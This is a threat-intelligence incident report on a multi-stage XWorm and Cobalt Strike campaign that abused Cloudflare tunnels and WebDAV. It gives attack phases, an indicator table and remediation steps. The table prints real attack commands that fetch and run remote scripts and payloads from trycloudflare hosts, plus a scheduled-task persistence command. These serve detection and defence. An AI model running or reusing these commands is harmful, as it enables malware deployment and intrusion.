Incident #2: XWorm Campaign
Reported: February 17, 2025 03:36 UTC
Potential Threat Actor
FIN7 - CARBANAK | MuddyWater | APT29 (Cozy Bear) | APT41 (Winnti Group)
Attack Type
Malware Deployment
Initial Vector
Email - WebDAV Exploitation
Attack Overview
A highly evasive, multi-stage attack that leverages Cloudflare Tunnels, WebDAV abuse, and advanced memory execution techniques—ultimately leading to XWorm and Cobalt Strike deployment. The adversary employed process injection and hollowing, and forensic artifact removal, reinforcing the likelihood of an advanced threat actor. The attack culminated in system logs being wiped and an abrupt system reset, indicating deliberate anti-forensic measures.
- Phase 1 - Initial Infection: Attacker sends an email with a .library.ms attachment. Windows executes the embedded XML containing a malicious URL.
- Phase 2 - Execution & Multiple Payload Retrieval: Once 1st stager executes, a trycloudflare[.]com tunnel is abused to drop additional Python files, DLLs, .lnk files, .vbs, JavaScript, and .bat files. Some files may serve as decoys.
- Phase 3 - Execution, Persistence, & Defense Evasion.: Multiple processes interact with malicious files, opening new C2 channels.
- Phase 4 - System Manipulation & Log Clearance: The adversary demonstrated advanced evasion tactics, including process hollowing, memory-based execution, and forensic artifact removal. The abrupt system reset and log clearance suggest a deliberate effort to cover tracks, reinforcing the likelihood of an advanced threat actor at work.
Key Indicators of Compromise (IOCs)
| Indicator | Description |
|---|---|
| \\canada-divisions-young-feedback.trycloudflare.com@SSL\DavWWWRoot\YFSAUJKSFA | Malicious URL/WebDAV Share |
| https://spokesman-disagree-comparing-feeling.trycloudflare.com/new.vbs | Malicious URL/WebDAV Share |
| mounts-og-annie-gm.trycloudflare.com@SSL\DavWWWRoot\55.js | Malicious URL/WebDAV Share |
| https://placing-approaches-odd-eds[.]trycloudflare[.]com/bab.zip | Malicious URL/WebDAV Share |
| "cmd.exe" /c \\webster-zealand-nurse-sox.trycloudflare.com@SSL\DavWWWRoot\new.bat | Process Execution |
| "cmd.exe" /c \\impressive-abs-respondent-accuracy.trycloudflare.com@SSL\DavWWWRoot\new.bat | Process Execution |
| 1TSB790283HJSA.lnk | Malicious .lnk file |
| 3YS7302120481_SCAN_pdf.lnk | Malicious .lnk file |
| tasklist /FI "IMAGENAME eq AvastUI.exe" | Security Tool Enumeration |
| WScript.exe "\\mounts-og-annie-gm[.]trycloudflare[.]com@SSL\DavWWWRoot\55.js" | Process Execution |
| rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie mounts-og-annie-gm[.]trycloudflare[.]com@SSL hxxps://mounts-og-annie-gm[.]trycloudflare[.]com/55.js | Process Execution |
| powershell -Command "Invoke-WebRequest -Uri 'https://placing-approaches-odd-eds[.]trycloudflare[.]com/bab.zip'" | Powershell Execution |
| "NOTEPAD.EXE" C:\Users\username\Python\Python312\NEWS.txt | Process Injection |
| 06ef01c2b9b1d5e2b668a96d6a45619f9c05fac1211818e12c32e51950d44e6 | SHA256 Hash |
| 41c3d475ca66d6ee25576e11dc620851f053075d31adc9fc191d4a382f4dd93 | SHA256 Hash |
| 32a0ea3ec1b3e57db8e52955deb2f3dd88eea79f8b6676d04aa989cee80678f4 | SHA256 Hash |
| 9a78e307c82cd08873611bab402a64a2d3a52cfa8c309e757241dfaa2588e2b3 | SHA256 Hash |
| 684ab9d329164818ba5239608319862193355c5a3c5e62fc8b832928db021475 | SHA256 Hash |
| "schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "goldk" /tr "C:\Users\ron\AppData\Roaming\goldk" | Persistence via scheduled task creation. Set to execute a specific binary, every minute, with highest privileges. |
Remediation Steps
Immediate Actions
- Isolate the affected system – Remove from the network to prevent further spread.
- Pull a full forensic disk image – Preserve evidence before rebooting.
- Rotate all credentials, especially in Azure AD – Prevent unauthorized access.
- Block outbound traffic to Cloudflare tunnels (trycloudflare.com) – Stop C2 communication.
- Disable WebDAV (davclnt.dll) if not needed – Prevent abuse of WebDAV for execution.
- Monitor WebDAV usage (rundll32.exe davclnt.dll) – Alert on unexpected executions.
- Review Azure logs for unusual admin activity – Check for privilege escalation/lateral movement.
- Check persistence mechanisms – Inspect Scheduled Tasks, Registry, Startup Folders for backdoors.
Long-term Mitigations
- Enforce application control (AppLocker, WDAC) – Block unsigned scripts/executables.
- Enable PowerShell logging (Script Block, Module Logging) – Improve script visibility.
- Monitor Cloudflare subdomains for abuse – Detect unusual DNS requests.
- Restrict execution of WScript and Rundll32 via GPO/AppLocker – Prevent script-based execution.
- Enhance network monitoring – Log unusual WebDAV connections.
- Enforce least privilege access – Reduce exposure to credential theft & lateral movement.
- Conduct security awareness training – Educate users on phishing & social engineering tactics.
